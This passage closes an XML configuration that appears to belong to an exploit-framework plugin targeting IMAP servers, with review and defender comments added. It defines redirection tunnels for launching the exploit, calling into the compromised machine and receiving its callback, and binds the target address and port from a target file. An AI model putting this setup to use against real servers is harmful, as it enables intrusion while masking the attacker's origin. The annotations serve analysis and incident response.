description="Masking byte"
type="U8"/>
</paramgroup>
</paramchoice>
</outputparameters>
<redirection>
<!-- Declares three TCP tunnels. Attribute values are names of input parameters (TargetIp, ListenPort, CallbackIp and so on), not literal addresses or ports. "ROC" in the comments below is not defined in this file. -->
<!-- Defender note: NOTE(review): if these tunnels run through an intermediate redirector, the peer address a mail server logs for the IMAP session or the call-in, and the address it calls back to, would be the redirector's rather than the operator's own host; treat logged addresses accordingly during incident response. -->
<!-- This is the tunnel used when we're "throwing" the exploit from the ROC -->
<!-- Carries the IMAP connection to TargetIp:TargetPort and is closed when the plugin completes. -->
<local
protocol="Tcp"
listenaddr="TargetIp"
listenport="TargetPort"
destaddr="TargetIp"
destport="TargetPort"
closeoncompletion="true"/>
<!-- This is the tunnel used when we're "calling in" from the ROC to the exploited machine -->
<!-- Maps ListenLocalPort to ListenPort on TargetIp and is left open after completion (closeoncompletion="false"). -->
<local
protocol="Tcp"
listenaddr="TargetIp"
listenport="ListenLocalPort"
destaddr="TargetIp"
destport="ListenPort"
closeoncompletion="false"/>
<!-- This is the tunnel we use when the exploit, after completing, "calls back" to the ROC -->
<!-- Listens on CallbackIp:CallbackPort and forwards to CallbackLocalPort; no destaddr or closeoncompletion attribute is given. -->
<remote
protocol="Tcp"
listenaddr="CallbackIp"
listenport="CallbackPort"
destport="CallbackLocalPort"/>
</redirection>
<logic>
<!-- Binds two input parameters to XPath expressions so their values can be filled in from another document instead of typed by hand. -->
<!-- NOTE(review): the document these paths are evaluated against is not part of this file; presumably it is a target description kept by the framework. -->
<service name="imap">
<!-- TargetPort is taken from the port of the service entry whose name is 'imap'. -->
<bindtopath name="TargetPort" path="//service[name='imap']/port"/>
</service>
<!-- TargetIp is taken from the identifier element. -->
<bindtopath name="TargetIp" path="//identifier"/>
</logic>
</config>